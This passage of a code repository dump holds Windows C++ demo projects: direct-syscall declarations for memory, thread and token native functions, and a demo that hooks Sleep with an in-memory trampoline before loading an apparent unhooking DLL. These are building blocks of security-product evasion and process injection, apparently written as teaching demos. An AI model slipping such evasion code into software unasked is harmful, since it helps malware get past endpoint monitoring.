PCLIENT_ID ClientId OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenProcessToken(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tOUT PHANDLE TokenHandle);\r\n\r\nEXTERN_C NTSTATUS NtTestAlert();\r\n\r\nEXTERN_C NTSTATUS NtOpenThread(\r\n\tOUT PHANDLE ThreadHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN PCLIENT_ID ClientId OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSuspendProcess(\r\n\tIN HANDLE ProcessHandle);\r\n\r\nEXTERN_C NTSTATUS NtSuspendThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tOUT PULONG 
PreviousSuspendCount);\r\n\r\nEXTERN_C NTSTATUS NtResumeProcess(\r\n\tIN HANDLE ProcessHandle);\r\n\r\nEXTERN_C NTSTATUS NtResumeThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN OUT PULONG PreviousSuspendCount OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtGetContextThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN OUT PCONTEXT ThreadContext);\r\n\r\nEXTERN_C NTSTATUS NtSetContextThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN PCONTEXT Context);\r\n\r\nEXTERN_C NTSTATUS NtClose(\r\n\tIN HANDLE Handle);\r\n\r\nEXTERN_C NTSTATUS NtReadVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress OPTIONAL,\r\n\tOUT PVOID Buffer,\r\n\tIN SIZE_T BufferSize,\r\n\tOUT PSIZE_T NumberOfBytesRead OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtWriteVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress,\r\n\tIN PVOID Buffer,\r\n\tIN SIZE_T NumberOfBytesToWrite,\r\n\tOUT PSIZE_T NumberOfBytesWritten OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAllocateVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID* BaseAddress,\r\n\tIN ULONG ZeroBits,\r\n\tIN OUT PSIZE_T RegionSize,\r\n\tIN ULONG AllocationType,\r\n\tIN ULONG Protect);\r\n\r\nEXTERN_C NTSTATUS NtProtectVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID* BaseAddress,\r\n\tIN OUT PSIZE_T RegionSize,\r\n\tIN ULONG NewProtect,\r\n\tOUT PULONG OldProtect);\r\n\r\nEXTERN_C NTSTATUS NtFreeVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID* BaseAddress,\r\n\tIN OUT PSIZE_T RegionSize,\r\n\tIN ULONG FreeType);\r\n\r\nEXTERN_C NTSTATUS NtQuerySystemInformation(\r\n\tIN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n\tIN OUT PVOID SystemInformation,\r\n\tIN ULONG SystemInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryDirectoryFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PVOID FileInformation,\r\n\tIN ULONG 
Length,\r\n\tIN FILE_INFORMATION_CLASS FileInformationClass,\r\n\tIN BOOLEAN ReturnSingleEntry,\r\n\tIN PUNICODE_STRING FileName OPTIONAL,\r\n\tIN BOOLEAN RestartScan);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PVOID FileInformation,\r\n\tIN ULONG Length,\r\n\tIN FILE_INFORMATION_CLASS FileInformationClass);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationProcess(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PROCESSINFOCLASS ProcessInformationClass,\r\n\tOUT PVOID ProcessInformation,\r\n\tIN ULONG ProcessInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN THREADINFOCLASS ThreadInformationClass,\r\n\tOUT PVOID ThreadInformation,\r\n\tIN ULONG ThreadInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateSection(\r\n\tOUT PHANDLE SectionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PLARGE_INTEGER MaximumSize OPTIONAL,\r\n\tIN ULONG SectionPageProtection,\r\n\tIN ULONG AllocationAttributes,\r\n\tIN HANDLE FileHandle OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenSection(\r\n\tOUT PHANDLE SectionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtMapViewOfSection(\r\n\tIN HANDLE SectionHandle,\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID BaseAddress,\r\n\tIN ULONG ZeroBits,\r\n\tIN SIZE_T CommitSize,\r\n\tIN OUT PLARGE_INTEGER SectionOffset OPTIONAL,\r\n\tIN OUT PSIZE_T ViewSize,\r\n\tIN SECTION_INHERIT InheritDisposition,\r\n\tIN ULONG AllocationType,\r\n\tIN ULONG Win32Protect);\r\n\r\nEXTERN_C NTSTATUS NtUnmapViewOfSection(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress);\r\n\r\nEXTERN_C NTSTATUS NtAdjustPrivilegesToken(\r\n\tIN HANDLE TokenHandle,\r\n\tIN BOOLEAN DisableAllPrivileges,\r\n\tIN PTOKEN_PRIVILEGES NewState OPTIONAL,\r\n\tIN 
ULONG BufferLength,\r\n\tOUT PTOKEN_PRIVILEGES PreviousState OPTIONAL,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtDeviceIoControlFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG IoControlCode,\r\n\tIN PVOID InputBuffer OPTIONAL,\r\n\tIN ULONG InputBufferLength,\r\n\tOUT PVOID OutputBuffer OPTIONAL,\r\n\tIN ULONG OutputBufferLength);\r\n\r\nEXTERN_C NTSTATUS NtQueueApcThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN PKNORMAL_ROUTINE ApcRoutine,\r\n\tIN PVOID ApcArgument1 OPTIONAL,\r\n\tIN PVOID ApcArgument2 OPTIONAL,\r\n\tIN PVOID ApcArgument3 OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtWaitForMultipleObjects(\r\n\tIN ULONG Count,\r\n\tIN PHANDLE Handles,\r\n\tIN WAIT_TYPE WaitType,\r\n\tIN BOOLEAN Alertable,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\n#endif\r\n"
  },
  {
    "path": "demo5/syscall3/syscall3/syscall3.cpp",
    "content": "﻿#include <iostream>\r\n#include \"1.h\"\r\n\r\nint main()\r\n{\r\n    NtTestAlert();\r\n\r\n    //std::cout << \"Hello World!\\n\";\r\n}"
  },
  {
    "path": "demo5/syscall3/syscall3/syscall3.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup Label=\"ProjectConfigurations\">\r\n    <ProjectConfiguration Include=\"Debug|Win32\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|Win32\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Debug|x64\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|x64\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n  </ItemGroup>\r\n  <PropertyGroup Label=\"Globals\">\r\n    <VCProjectVersion>16.0</VCProjectVersion>\r\n    <Keyword>Win32Proj</Keyword>\r\n    <ProjectGuid>{7504426e-c438-432a-8e89-ae02608b2055}</ProjectGuid>\r\n    <RootNamespace>syscall3</RootNamespace>\r\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    
<CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\r\n  <ImportGroup Label=\"ExtensionSettings\">\r\n    <Import Project=\"$(VCTargetsPath)\\BuildCustomizations\\masm.props\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"Shared\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  
<ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <PropertyGroup Label=\"UserMacros\" />\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n   
 <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"syscall3.cpp\" />\r\n    <ClCompile Include=\"1.cpp\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <MASM Include=\"1-asm.x64.asm\">\r\n      <FileType>Document</FileType>\r\n      <NoLogo Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">true</NoLogo>\r\n      <GenerateDebugInformation Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">true</GenerateDebugInformation>\r\n      <AdditionalOptions Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n      </AdditionalOptions>\r\n      <WarningLevel Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">3</WarningLevel>\r\n      <DeploymentContent Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">true</DeploymentContent>\r\n      <EnableMASM51Compatibility Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">true</EnableMASM51Compatibility>\r\n      <MakeAllSymbolsPublic Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">true</MakeAllSymbolsPublic>\r\n    </MASM>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"1.h\" />\r\n  
</ItemGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\r\n  <ImportGroup Label=\"ExtensionTargets\">\r\n    <Import Project=\"$(VCTargetsPath)\\BuildCustomizations\\masm.targets\" />\r\n  </ImportGroup>\r\n</Project>"
  },
  {
    "path": "demo5/syscall3/syscall3/syscall3.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup>\r\n    <Filter Include=\"源文件\">\r\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\r\n      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"头文件\">\r\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\r\n      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"资源文件\">\r\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\r\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\r\n    </Filter>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"syscall3.cpp\">\r\n      <Filter>源文件</Filter>\r\n    </ClCompile>\r\n    <ClCompile Include=\"1.cpp\">\r\n      <Filter>源文件</Filter>\r\n    </ClCompile>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"1.h\">\r\n      <Filter>头文件</Filter>\r\n    </ClInclude>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <MASM Include=\"1-asm.x64.asm\">\r\n      <Filter>源文件</Filter>\r\n    </MASM>\r\n  </ItemGroup>\r\n</Project>"
  },
  {
    "path": "demo5/syscall3/syscall3/syscall3.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <PropertyGroup />\r\n</Project>"
  },
  {
    "path": "demo5/syscall3/syscall3.sln",
    "content": "﻿\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.2.32519.379\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"syscall3\", \"syscall3\\syscall3.vcxproj\", \"{7504426E-C438-432A-8E89-AE02608B2055}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{7504426E-C438-432A-8E89-AE02608B2055}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{7504426E-C438-432A-8E89-AE02608B2055}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{7504426E-C438-432A-8E89-AE02608B2055}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{7504426E-C438-432A-8E89-AE02608B2055}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{7504426E-C438-432A-8E89-AE02608B2055}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{7504426E-C438-432A-8E89-AE02608B2055}.Release|x64.Build.0 = Release|x64\r\n\t\t{7504426E-C438-432A-8E89-AE02608B2055}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{7504426E-C438-432A-8E89-AE02608B2055}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {82B009C0-3F9F-4740-A7B3-B4F1FA9BB428}\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  },
  {
    "path": "demo6/unhook_demo/Header.h",
    "content": "#pragma once\r\n#include <windows.h>\n#include <iostream>\n#include <sstream>\n#include <iomanip>\n#include <vector>\r\n\r\ntypedef void  (WINAPI* typeSleep)(\n\tDWORD dwMilis\n\t);\r\n\r\ntypedef DWORD(NTAPI* typeNtFlushInstructionCache)(\n\tHANDLE ProcessHandle,\n\tPVOID BaseAddress,\n\tULONG NumberOfBytesToFlush\n\t);\r\n\r\ntypedef std::unique_ptr<std::remove_pointer<HANDLE>::type, decltype(&::CloseHandle)> HandlePtr;\n\nstruct HookedSleep\n{\n\ttypeSleep origSleep;\n\tBYTE    sleepStub[16];\n};\r\n\r\nstruct HookTrampolineBuffers\n{\n\t// (Input) Buffer containing bytes that should be restored while unhooking.\n\tBYTE* originalBytes;\n\tDWORD originalBytesSize;\n\n\t// (Output) Buffer that will receive bytes present prior to trampoline installation/restoring.\n\tBYTE* previousBytes;\n\tDWORD previousBytesSize;\n};\n\r\n\r\nvoid WINAPI MySleep(DWORD _dwMilliseconds);"
  },
  {
    "path": "demo6/unhook_demo/unhook_demo.cpp",
    "content": "// unhook_demo.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n//\r\n\r\n#include <iostream>\r\n#include <intrin.h>\r\n#include \"Header.h\"\r\n\r\nusing namespace std;\r\n\r\nHookedSleep g_hookedSleep;\r\n\r\nvoid WINAPI MySleep(DWORD dwMilliseconds)\n{\n\t//\n\t// Locate this stack frame's return address.\n\t// \n\t//MessageBoxA(0,\"whoami\",NULL, NULL);\n\n\tcout << \"hooked sleep executed\" << endl;\n}\r\n\r\n\r\nbool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers /*= NULL*/)\n{\n#ifdef _WIN64\n\tuint8_t trampoline[] = {\n\t\t0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov r10, addr\n\t\t0x41, 0xFF, 0xE2                                            // jmp r10\n\t};\n\n\tuint64_t addr = (uint64_t)(jumpAddress);\n\tmemcpy(&trampoline[2], &addr, sizeof(addr));\n#else\n\tuint8_t trampoline[] = {\n\t\t0xB8, 0x00, 0x00, 0x00, 0x00,     // mov eax, addr\n\t\t0xFF, 0xE0                        // jmp eax\n\t};\n\n\tuint32_t addr = (uint32_t)(jumpAddress);\n\tmemcpy(&trampoline[1], &addr, sizeof(addr));\n#endif\n\n\tDWORD dwSize = sizeof(trampoline);\n\tDWORD oldProt = 0;\n\tbool output = false;\n\n\tif (installHook)\n\t{\n\t\tif (buffers != NULL)\n\t\t{\n\t\t\tif (buffers->previousBytes == nullptr || buffers->previousBytesSize == 0)\n\t\t\t\treturn false;\n\n\t\t\tmemcpy(buffers->previousBytes, addressToHook, buffers->previousBytesSize);\n\t\t}\n\n\t\tif (::VirtualProtect(\n\t\t\taddressToHook,\n\t\t\tdwSize,\n\t\t\tPAGE_EXECUTE_READWRITE,\n\t\t\t&oldProt\n\t\t))\n\t\t{\n\t\t\tmemcpy(addressToHook, trampoline, dwSize);\n\t\t\toutput = true;\n\t\t}\n\t}\n\telse\n\t{\n\t\tif (buffers == NULL)\n\t\t\treturn false;\n\n\t\tif (buffers->originalBytes == nullptr || buffers->originalBytesSize == 0)\n\t\t\treturn false;\n\n\t\tdwSize = buffers->originalBytesSize;\n\n\t\tif 
(::VirtualProtect(\n\t\t\taddressToHook,\n\t\t\tdwSize,\n\t\t\tPAGE_EXECUTE_READWRITE,\n\t\t\t&oldProt\n\t\t))\n\t\t{\n\t\t\tmemcpy(addressToHook, buffers->originalBytes, dwSize);\n\t\t\toutput = true;\n\t\t}\n\t}\n\n\tstatic typeNtFlushInstructionCache pNtFlushInstructionCache = NULL;\n\tif (!pNtFlushInstructionCache)\n\t\tpNtFlushInstructionCache = (typeNtFlushInstructionCache)\n\t\tGetProcAddress(GetModuleHandleA(\"ntdll\"), \"NtFlushInstructionCache\");\n\n\t//\n\t// We're flushing instructions cache just in case our hook didn't kick in immediately.\n\t//\n\tif (pNtFlushInstructionCache)\n\t\tpNtFlushInstructionCache(GetCurrentProcess(), addressToHook, dwSize);\n\n\t::VirtualProtect(\n\t\taddressToHook,\n\t\tdwSize,\n\t\toldProt,\n\t\t&oldProt\n\t);\n\n\treturn output;\n}\n\nbool hookSleep()\n{\n\tHookTrampolineBuffers buffers = { 0 };\n\tbuffers.previousBytes = g_hookedSleep.sleepStub;\n\tbuffers.previousBytesSize = sizeof(g_hookedSleep.sleepStub);\n\n\tg_hookedSleep.origSleep = reinterpret_cast<typeSleep>(Sleep);\n\n\tif (!fastTrampoline(true, (BYTE*)::Sleep, (void*)& MySleep, &buffers))\n\t\treturn false;\n\n\treturn true;\n}\r\n\r\nint main()\r\n{\r\n\thookSleep();\r\n\tSleep(5000);\r\n\t#define FROM_DISK == 1\n\tHMODULE hwhand = LoadLibraryA(\"RefleXXion-DLL.dll\");\r\n\tSleep(5000);\r\n}\r\n\r\n// Run program: Ctrl + F5 or Debug > Start Without Debugging menu\r\n// Debug program: F5 or Debug > Start Debugging menu\r\n\r\n// Tips for Getting Started: \r\n//   1. Use the Solution Explorer window to add/manage files\r\n//   2. Use the Team Explorer window to connect to source control\r\n//   3. Use the Output window to see build output and other messages\r\n//   4. Use the Error List window to view errors\r\n//   5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project\r\n//   6. In the future, to open this project again, go to File > Open > Project and select the .sln file\r\n"
  },
  {
    "path": "demo6/unhook_demo/unhook_demo.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup Label=\"ProjectConfigurations\">\r\n    <ProjectConfiguration Include=\"Debug|Win32\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|Win32\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Debug|x64\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|x64\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n  </ItemGroup>\r\n  <PropertyGroup Label=\"Globals\">\r\n    <VCProjectVersion>16.0</VCProjectVersion>\r\n    <ProjectGuid>{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}</ProjectGuid>\r\n    <Keyword>Win32Proj</Keyword>\r\n    <RootNamespace>unhookdemo</RootNamespace>\r\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v142</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v142</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    
<CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v142</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v142</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\r\n  <ImportGroup Label=\"ExtensionSettings\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"Shared\">\r\n  